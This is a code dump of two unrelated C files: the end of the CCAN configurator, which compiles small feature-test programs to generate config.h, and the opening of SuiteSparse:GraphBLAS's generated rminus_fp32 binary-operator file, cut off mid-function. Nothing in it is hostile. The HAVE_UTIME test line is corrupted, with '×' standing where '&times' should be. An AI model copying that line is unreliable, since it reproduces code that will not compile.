"INSIDE_MAIN", NULL, NULL,
"int ret = 1;\n"
"for (int i = 0; i < argc; i++) { ret = 0; };\n"
"return ret;" },
{ "HAVE_FLEXIBLE_ARRAY_MEMBER", "flexible array member support",
"OUTSIDE_MAIN", NULL, NULL,
"struct foo { unsigned int x; int arr[]; };" },
{ "HAVE_GETPAGESIZE", "getpagesize() in <unistd.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <unistd.h>\n"
"static int func(void) { return getpagesize(); }" },
{ "HAVE_ISBLANK", "isblank() in <ctype.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <ctype.h>\n"
"static int func(void) { return isblank(' '); }" },
{ "HAVE_LITTLE_ENDIAN", "little endian",
"INSIDE_MAIN|EXECUTE", NULL, NULL,
"union { int i; char c[sizeof(int)]; } u;\n"
"u.i = 0x01020304;\n"
"return u.c[0] == 0x04 && u.c[1] == 0x03 && u.c[2] == 0x02 && u.c[3] == 0x01 ? 0 : 1;" },
{ "HAVE_MEMMEM", "memmem in <string.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <string.h>\n"
"static void *func(void *h, size_t hl, void *n, size_t nl) {\n"
"return memmem(h, hl, n, nl);"
"}\n", },
{ "HAVE_MEMRCHR", "memrchr in <string.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <string.h>\n"
"static void *func(void *s, int c, size_t n) {\n"
"return memrchr(s, c, n);"
"}\n", },
{ "HAVE_MMAP", "mmap() declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/mman.h>\n"
"static void *func(int fd) {\n"
" return mmap(0, 65536, PROT_READ, MAP_SHARED, fd, 0);\n"
"}" },
{ "HAVE_PROC_SELF_MAPS", "/proc/self/maps exists",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"#include <sys/stat.h>\n"
"#include <fcntl.h>\n"
"int main(void) {\n"
" return open(\"/proc/self/maps\", O_RDONLY) != -1 ? 0 : 1;\n"
"}\n" },
{ "HAVE_QSORT_R_PRIVATE_LAST", "qsort_r cmp takes trailing arg",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <stdlib.h>\n"
"static int cmp(const void *lp, const void *rp, void *priv) {\n"
" *(unsigned int *)priv = 1;\n"
" return *(const int *)lp - *(const int *)rp; }\n"
"int main(void) {\n"
" int array[] = { 9, 2, 5 };\n"
" unsigned int called = 0;\n"
" qsort_r(array, 3, sizeof(int), cmp, &called);\n"
" return called && array[0] == 2 && array[1] == 5 && array[2] == 9 ? 0 : 1;\n"
"}\n" },
{ "HAVE_STRUCT_TIMESPEC", "struct timespec declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <time.h>\n"
"static void func(void) {\n"
" struct timespec ts;\n"
" ts.tv_sec = ts.tv_nsec = 1;\n"
"}\n" },
{ "HAVE_SECTION_START_STOP", "__attribute__((section)) and __start/__stop",
"DEFINES_FUNC", NULL, NULL,
"static void *__attribute__((__section__(\"mysec\"))) p = &p;\n"
"static int func(void) {\n"
" extern void *__start_mysec[], *__stop_mysec[];\n"
" return __stop_mysec - __start_mysec;\n"
"}\n" },
{ "HAVE_STACK_GROWS_UPWARDS", "stack grows upwards",
"DEFINES_EVERYTHING|EXECUTE", NULL, NULL,
"#include <stddef.h>\n"
"static ptrdiff_t nest(const void *base, unsigned int i)\n"
"{\n"
" if (i == 0)\n"
" return (const char *)&i - (const char *)base;\n"
" return nest(base, i-1);\n"
"}\n"
"int main(int argc, char *argv[]) {\n"
" (void)argv;\n"
" return (nest(&argc, argc) > 0) ? 0 : 1;\n"
"}\n" },
{ "HAVE_STATEMENT_EXPR", "statement expression support",
"INSIDE_MAIN", NULL, NULL,
"return ({ int x = argc; x == argc ? 0 : 1; });" },
{ "HAVE_SYS_FILIO_H", "<sys/filio.h>",
"OUTSIDE_MAIN", NULL, NULL, /* Solaris needs this for FIONREAD */
"#include <sys/filio.h>\n" },
{ "HAVE_SYS_TERMIOS_H", "<sys/termios.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <sys/termios.h>\n" },
{ "HAVE_SYS_UNISTD_H", "<sys/unistd.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <sys/unistd.h>\n" },
{ "HAVE_TYPEOF", "__typeof__ support",
"INSIDE_MAIN", NULL, NULL,
"__typeof__(argc) i; i = argc; return i == argc ? 0 : 1;" },
{ "HAVE_UNALIGNED_ACCESS", "unaligned access to int",
"DEFINES_EVERYTHING|EXECUTE", NULL, NULL,
"#include <string.h>\n"
"int main(int argc, char *argv[]) {\n"
" (void)argc;\n"
" char pad[sizeof(int *) * 1];\n"
" strncpy(pad, argv[0], sizeof(pad));\n"
" int *x = (int *)pad, *y = (int *)(pad + 1);\n"
" return *x == *y;\n"
"}\n" },
{ "HAVE_UTIME", "utime() declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/types.h>\n"
"#include <utime.h>\n"
"static int func(const char *filename) {\n"
" struct utimbuf times = { 0 };\n"
" return utime(filename, ×);\n"
"}" },
{ "HAVE_WARN_UNUSED_RESULT", "__attribute__((warn_unused_result))",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/types.h>\n"
"#include <utime.h>\n"
"static __attribute__((warn_unused_result)) int func(int i) {\n"
" return i + 1;\n"
"}" },
{ "HAVE_OPENMP", "#pragma omp and -fopenmp support",
"INSIDE_MAIN", NULL, NULL,
"int i;\n"
"#pragma omp parallel for\n"
"for(i = 0; i < 0; i++) {};\n"
"return 0;\n",
"-Werror -fopenmp" },
{ "HAVE_VALGRIND_MEMCHECK_H", "<valgrind/memcheck.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <valgrind/memcheck.h>\n" },
{ "HAVE_UCONTEXT", "working <ucontext.h",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
NULL, NULL,
"#include <ucontext.h>\n"
"static int x = 0;\n"
"static char stack[2048];\n"
"static ucontext_t a, b;\n"
"static void fn(void) {\n"
" x |= 2;\n"
" setcontext(&b);\n"
" x |= 4;\n"
"}\n"
"int main(void) {\n"
" x |= 1;\n"
" getcontext(&a);\n"
" a.uc_stack.ss_sp = stack;\n"
" a.uc_stack.ss_size = sizeof(stack);\n"
" makecontext(&a, fn, 0);\n"
" swapcontext(&b, &a);\n"
" return (x == 3) ? 0 : 1;\n"
"}\n"
},
{ "HAVE_POINTER_SAFE_MAKECONTEXT", "passing pointers via makecontext()",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
"HAVE_UCONTEXT", NULL,
"#include <stddef.h>\n"
"#include <ucontext.h>\n"
"static int worked = 0;\n"
"static char stack[1024];\n"
"static ucontext_t a, b;\n"
"static void fn(void *p, void *q) {\n"
" void *cp = &worked;\n"
" void *cq = (void *)(~((ptrdiff_t)cp));\n"
" if ((p == cp) && (q == cq))\n"
" worked = 1;\n"
" setcontext(&b);\n"
"}\n"
"int main(void) {\n"
" void *ap = &worked;\n"
" void *aq = (void *)(~((ptrdiff_t)ap));\n"
" getcontext(&a);\n"
" a.uc_stack.ss_sp = stack;\n"
" a.uc_stack.ss_size = sizeof(stack);\n"
" makecontext(&a, (void (*)(void))fn, 2, ap, aq);\n"
" swapcontext(&b, &a);\n"
" return worked ? 0 : 1;\n"
"}\n"
},
{ "HAVE_BUILTIN_CPU_SUPPORTS", "__builtin_cpu_supports()",
"DEFINES_FUNC", NULL, NULL,
"#include <stdbool.h>\n"
"static bool func(void) {\n"
" return __builtin_cpu_supports(\"mmx\");\n"
"}"
},
};
static void c12r_err(int eval, const char *fmt, ...)
{
int err_errno = errno;
va_list ap;
fprintf(stderr, "%s: ", progname);
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
fprintf(stderr, ": %s\n", strerror(err_errno));
exit(eval);
}
static void c12r_errx(int eval, const char *fmt, ...)
{
va_list ap;
fprintf(stderr, "%s: ", progname);
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
fprintf(stderr, "\n");
exit(eval);
}
static void start_test(const char *what, const char *why)
{
if (like_a_libtool) {
printf("%s%s... ", what, why);
fflush(stdout);
}
}
static void end_test(bool result)
{
if (like_a_libtool)
printf("%s\n", result ? "yes" : "no");
}
static size_t fcopy(FILE *fsrc, FILE *fdst)
{
char buffer[BUFSIZ];
size_t rsize, wsize;
size_t copied = 0;
while ((rsize = fread(buffer, 1, BUFSIZ, fsrc)) > 0) {
wsize = fwrite(buffer, 1, rsize, fdst);
copied += wsize;
if (wsize != rsize)
break;
}
return copied;
}
static char *grab_stream(FILE *file)
{
size_t max, ret, size = 0;
char *buffer;
max = BUFSIZ;
buffer = malloc(max);
while ((ret = fread(buffer+size, 1, max - size, file)) == max - size) {
size += ret;
buffer = realloc(buffer, max *= 2);
}
size += ret;
if (ferror(file))
c12r_err(EXIT_TROUBLE_RUNNING, "reading from command");
buffer[size] = '\0';
return buffer;
}
static char *run(const char *cmd, int *exitstatus)
{
static const char redir[] = " 2>&1";
size_t cmdlen;
char *cmdredir;
FILE *cmdout;
char *ret;
cmdlen = strlen(cmd);
cmdredir = malloc(cmdlen + sizeof(redir));
memcpy(cmdredir, cmd, cmdlen);
memcpy(cmdredir + cmdlen, redir, sizeof(redir));
cmdout = popen(cmdredir, "r");
if (!cmdout)
c12r_err(EXIT_TROUBLE_RUNNING, "popen \"%s\"", cmdredir);
free(cmdredir);
ret = grab_stream(cmdout);
*exitstatus = pclose(cmdout);
return ret;
}
static char *connect_args(const char *argv[], const char *outflag,
const char *files)
{
unsigned int i;
char *ret;
size_t len = strlen(outflag) + strlen(files) + 1;
for (i = 1; argv[i]; i++)
len += 1 + strlen(argv[i]);
ret = malloc(len);
len = 0;
for (i = 1; argv[i]; i++) {
strcpy(ret + len, argv[i]);
len += strlen(argv[i]);
if (argv[i+1] || *outflag)
ret[len++] = ' ';
}
strcpy(ret + len, outflag);
len += strlen(outflag);
strcpy(ret + len, files);
return ret;
}
static struct test *find_test(const char *name)
{
unsigned int i;
for (i = 0; tests[i].name; i++) {
if (strcmp(tests[i].name, name) == 0)
return &tests[i];
}
c12r_errx(EXIT_BAD_TEST, "Unknown test %s", name);
abort();
}
#define PRE_BOILERPLATE "/* Test program generated by configurator. */\n"
#define MAIN_START_BOILERPLATE \
"int main(int argc, char *argv[]) {\n" \
" (void)argc;\n" \
" (void)argv;\n"
#define USE_FUNC_BOILERPLATE "(void)func;\n"
#define MAIN_BODY_BOILERPLATE "return 0;\n"
#define MAIN_END_BOILERPLATE "}\n"
static bool run_test(const char *cmd, struct test *test)
{
char *output, *newcmd;
FILE *outf;
int status;
if (test->done)
return test->answer;
if (test->depends) {
size_t len;
const char *deps = test->depends;
char *dep;
/* Space-separated dependencies, could be ! for inverse. */
while ((len = strcspn(deps, " ")) != 0) {
bool positive = true;
if (deps[len]) {
dep = strdup(deps);
dep[len] = '\0';
} else {
dep = (char *)deps;
}
if (dep[0] == '!') {
dep++;
positive = false;
}
if (run_test(cmd, find_test(dep)) != positive) {
test->answer = false;
test->done = true;
return test->answer;
}
if (deps[len])
free(dep);
deps += len;
deps += strspn(deps, " ");
}
}
outf = fopen(INPUT_FILE, verbose > 1 ? "w+" : "w");
if (!outf)
c12r_err(EXIT_TROUBLE_RUNNING, "creating %s", INPUT_FILE);
fprintf(outf, "%s", PRE_BOILERPLATE);
if (strstr(test->style, "INSIDE_MAIN")) {
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "OUTSIDE_MAIN")) {
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", MAIN_BODY_BOILERPLATE);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "DEFINES_FUNC")) {
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", USE_FUNC_BOILERPLATE);
fprintf(outf, "%s", MAIN_BODY_BOILERPLATE);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "DEFINES_EVERYTHING")) {
fprintf(outf, "%s", test->fragment);
} else
c12r_errx(EXIT_BAD_TEST, "Unknown style for test %s: %s",
test->name, test->style);
if (verbose > 1) {
fseek(outf, 0, SEEK_SET);
fcopy(outf, stdout);
}
fclose(outf);
newcmd = strdup(cmd);
if (test->flags) {
newcmd = realloc(newcmd, strlen(newcmd) + strlen(" ")
+ strlen(test->flags) + 1);
strcat(newcmd, " ");
strcat(newcmd, test->flags);
if (verbose > 1)
printf("Extra flags line: %s", newcmd);
}
if (test->link) {
newcmd = realloc(newcmd, strlen(newcmd) + strlen(" ")
+ strlen(test->link) + 1);
strcat(newcmd, " ");
strcat(newcmd, test->link);
if (verbose > 1)
printf("Extra link line: %s", newcmd);
}
start_test("checking for ", test->desc);
output = run(newcmd, &status);
free(newcmd);
if (status != 0 || strstr(output, "warning")) {
if (verbose)
printf("Compile %s for %s, status %i: %s\n",
status ? "fail" : "warning",
test->name, status, output);
if (strstr(test->style, "EXECUTE")
&& !strstr(test->style, "MAY_NOT_COMPILE"))
c12r_errx(EXIT_BAD_TEST,
"Test for %s did not compile:\n%s",
test->name, output);
test->answer = false;
free(output);
} else {
/* Compile succeeded. */
free(output);
/* We run INSIDE_MAIN tests for sanity checking. */
if (strstr(test->style, "EXECUTE")
|| strstr(test->style, "INSIDE_MAIN")) {
output = run("." DIR_SEP OUTPUT_FILE, &status);
if (!strstr(test->style, "EXECUTE") && status != 0)
c12r_errx(EXIT_BAD_TEST,
"Test for %s failed with %i:\n%s",
test->name, status, output);
if (verbose && status)
printf("%s exited %i\n", test->name, status);
free(output);
}
test->answer = (status == 0);
}
test->done = true;
end_test(test->answer);
if (test->answer && test->overrides) {
struct test *override = find_test(test->overrides);
override->done = true;
override->answer = true;
}
return test->answer;
}
static char *any_field(char **fieldname)
{
char buf[1000];
for (;;) {
char *p, *eq;
if (!fgets(buf, sizeof(buf), stdin))
return NULL;
p = buf;
/* Ignore whitespace, lines starting with # */
while (*p == ' ' || *p == '\t')
p++;
if (*p == '#' || *p == '\n')
continue;
eq = strchr(p, '=');
if (!eq)
c12r_errx(EXIT_BAD_INPUT, "no = in line: %s", p);
*eq = '\0';
*fieldname = strdup(p);
p = eq + 1;
if (strlen(p) && p[strlen(p)-1] == '\n')
p[strlen(p)-1] = '\0';
return strdup(p);
}
}
static char *read_field(const char *name, bool compulsory)
{
char *fieldname, *value;
value = any_field(&fieldname);
if (!value) {
if (!compulsory)
return NULL;
c12r_errx(EXIT_BAD_INPUT, "Could not read field %s", name);
}
if (strcmp(fieldname, name) != 0)
c12r_errx(EXIT_BAD_INPUT,
"Expected field %s not %s", name, fieldname);
return value;
}
/* Test descriptions from stdin:
* Lines starting with # or whitespace-only are ignored.
*
* First three non-ignored lines must be:
* var=<varname>
* desc=<description-for-autotools-style>
* style=OUTSIDE_MAIN DEFINES_FUNC INSIDE_MAIN DEFINES_EVERYTHING EXECUTE MAY_NOT_COMPILE
*
* Followed by optional lines:
* depends=<space-separated-testnames, ! to invert>
* link=<extra args for link line>
* flags=<extra args for compile line>
* overrides=<testname-to-force>
*
* Finally a code line, either:
* code=<oneline> OR
* code=
* <lines of code>
* <end-comment>
*
* And <end-comment> looks like this next comment: */
/*END*/
static bool read_test(struct test *test)
{
char *field, *value;
char buf[1000];
memset(test, 0, sizeof(*test));
test->name = read_field("var", false);
if (!test->name)
return false;
test->desc = read_field("desc", true);
test->style = read_field("style", true);
/* Read any optional fields. */
while ((value = any_field(&field)) != NULL) {
if (strcmp(field, "depends") == 0)
test->depends = value;
else if (strcmp(field, "link") == 0)
test->link = value;
else if (strcmp(field, "flags") == 0)
test->flags = value;
else if (strcmp(field, "overrides") == 0)
test->overrides = value;
else if (strcmp(field, "code") == 0)
break;
else
c12r_errx(EXIT_BAD_INPUT, "Unknown field %s in %s",
field, test->name);
}
if (!value)
c12r_errx(EXIT_BAD_INPUT, "Missing code in %s", test->name);
if (strlen(value) == 0) {
/* Multiline program, read to END comment */
while (fgets(buf, sizeof(buf), stdin) != 0) {
size_t n;
if (strncmp(buf, "/*END*/", 7) == 0)
break;
n = strlen(value);
value = realloc(value, n + strlen(buf) + 1);
strcpy(value + n, buf);
n += strlen(buf);
}
}
test->fragment = value;
return true;
}
static void read_tests(size_t num_tests)
{
while (read_test(tests + num_tests)) {
num_tests++;
tests = realloc(tests, (num_tests + 1) * sizeof(tests[0]));
tests[num_tests].name = NULL;
}
}
int main(int argc, const char *argv[])
{
char *cmd;
unsigned int i;
const char *default_args[]
= { "", DEFAULT_COMPILER, DEFAULT_FLAGS, NULL };
const char *outflag = DEFAULT_OUTPUT_EXE_FLAG;
const char *configurator_cc = NULL;
const char *orig_cc;
const char *varfile = NULL;
const char *headerfile = NULL;
bool extra_tests = false;
FILE *outf;
if (argc > 0)
progname = argv[0];
while (argc > 1) {
if (strcmp(argv[1], "--help") == 0) {
printf("Usage: configurator [-v] [--var-file=<filename>] [-O<outflag>] [--configurator-cc=<compiler-for-tests>] [--autotools-style] [--extra-tests] [<compiler> <flags>...]\n"
" <compiler> <flags> will have \"<outflag> <outfile> <infile.c>\" appended\n"
"Default: %s %s %s\n",
DEFAULT_COMPILER, DEFAULT_FLAGS,
DEFAULT_OUTPUT_EXE_FLAG);
exit(0);
}
if (strncmp(argv[1], "-O", 2) == 0) {
argc--;
argv++;
outflag = argv[1] + 2;
if (!*outflag) {
fprintf(stderr,
"%s: option requires an argument -- O\n",
argv[0]);
exit(EXIT_BAD_USAGE);
}
} else if (strcmp(argv[1], "-v") == 0) {
argc--;
argv++;
verbose++;
} else if (strcmp(argv[1], "-vv") == 0) {
argc--;
argv++;
verbose += 2;
} else if (strncmp(argv[1], "--configurator-cc=", 18) == 0) {
configurator_cc = argv[1] + 18;
argc--;
argv++;
} else if (strncmp(argv[1], "--var-file=", 11) == 0) {
varfile = argv[1] + 11;
argc--;
argv++;
} else if (strcmp(argv[1], "--autotools-style") == 0) {
like_a_libtool = true;
argc--;
argv++;
} else if (strncmp(argv[1], "--header-file=", 14) == 0) {
headerfile = argv[1] + 14;
argc--;
argv++;
} else if (strcmp(argv[1], "--extra-tests") == 0) {
extra_tests = true;
argc--;
argv++;
} else if (strcmp(argv[1], "--") == 0) {
break;
} else if (argv[1][0] == '-') {
c12r_errx(EXIT_BAD_USAGE, "Unknown option %s", argv[1]);
} else {
break;
}
}
if (argc == 1)
argv = default_args;
/* Copy with NULL entry at end */
tests = calloc(sizeof(base_tests)/sizeof(base_tests[0]) + 1,
sizeof(base_tests[0]));
memcpy(tests, base_tests, sizeof(base_tests));
if (extra_tests)
read_tests(sizeof(base_tests)/sizeof(base_tests[0]));
orig_cc = argv[1];
if (configurator_cc)
argv[1] = configurator_cc;
cmd = connect_args(argv, outflag, OUTPUT_FILE " " INPUT_FILE);
if (like_a_libtool) {
start_test("Making autoconf users comfortable", "");
sleep(1);
end_test(1);
}
for (i = 0; tests[i].name; i++)
run_test(cmd, &tests[i]);
free(cmd);
remove(OUTPUT_FILE);
remove(INPUT_FILE);
if (varfile) {
FILE *vars;
if (strcmp(varfile, "-") == 0)
vars = stdout;
else {
start_test("Writing variables to ", varfile);
vars = fopen(varfile, "a");
if (!vars)
c12r_err(EXIT_TROUBLE_RUNNING,
"Could not open %s", varfile);
}
for (i = 0; tests[i].name; i++)
fprintf(vars, "%s=%u\n", tests[i].name, tests[i].answer);
if (vars != stdout) {
if (fclose(vars) != 0)
c12r_err(EXIT_TROUBLE_RUNNING,
"Closing %s", varfile);
end_test(1);
}
}
if (headerfile) {
start_test("Writing header to ", headerfile);
outf = fopen(headerfile, "w");
if (!outf)
c12r_err(EXIT_TROUBLE_RUNNING,
"Could not open %s", headerfile);
} else
outf = stdout;
fprintf(outf, "/* Generated by CCAN configurator */\n"
"#ifndef CCAN_CONFIG_H\n"
"#define CCAN_CONFIG_H\n");
fprintf(outf, "#ifndef _GNU_SOURCE\n");
fprintf(outf, "#define _GNU_SOURCE /* Always use GNU extensions. */\n");
fprintf(outf, "#endif\n");
fprintf(outf, "#define CCAN_COMPILER \"%s\"\n", orig_cc);
cmd = connect_args(argv + 1, "", "");
fprintf(outf, "#define CCAN_CFLAGS \"%s\"\n", cmd);
free(cmd);
fprintf(outf, "#define CCAN_OUTPUT_EXE_CFLAG \"%s\"\n\n", outflag);
/* This one implies "#include <ccan/..." works, eg. for tdb2.h */
fprintf(outf, "#define HAVE_CCAN 1\n");
for (i = 0; tests[i].name; i++)
fprintf(outf, "#define %s %u\n", tests[i].name, tests[i].answer);
fprintf(outf, "#endif /* CCAN_CONFIG_H */\n");
if (headerfile) {
if (fclose(outf) != 0)
c12r_err(EXIT_TROUBLE_RUNNING, "Closing %s", headerfile);
end_test(1);
}
return 0;
}
|
GB_binop__rminus_fp32.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCUDA_DEV
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_08__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_02__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_04__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__rminus_fp32)
// A*D function (colscale): GB (_AxD__rminus_fp32)
// D*A function (rowscale): GB (_DxB__rminus_fp32)
// C+=B function (dense accum): GB (_Cdense_accumB__rminus_fp32)
// C+=b function (dense accum): GB (_Cdense_accumb__rminus_fp32)
// C+=A+B function (dense ewise3): GB (_Cdense_ewise3_accum__rminus_fp32)
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__rminus_fp32)
// C=scalar+B GB (_bind1st__rminus_fp32)
// C=scalar+B' GB (_bind1st_tran__rminus_fp32)
// C=A+scalar GB (_bind2nd__rminus_fp32)
// C=A'+scalar GB (_bind2nd_tran__rminus_fp32)
// C type: float
// A type: float
// A pattern? 0
// B type: float
// B pattern? 0
// BinaryOp: cij = (bij - aij)
#define GB_ATYPE \
float
#define GB_BTYPE \
float
#define GB_CTYPE \
float
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
float aij = GBX (Ax, pA, A_iso)
// true if values of A are not used
#define GB_A_IS_PATTERN \
0 \
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
float bij = GBX (Bx, pB, B_iso)
// true if values of B are not used
#define GB_B_IS_PATTERN \
0 \
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
float t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = (y - x) ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_RMINUS || GxB_NO_FP32 || GxB_NO_RMINUS_FP32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB (_Cdense_ewise3_accum__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__rminus_fp32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type float
float bwork = (*((float *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__rminus_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
float alpha_scalar ;
float beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((float *) alpha_scalar_in)) ;
beta_scalar = (*((float *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__rminus_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
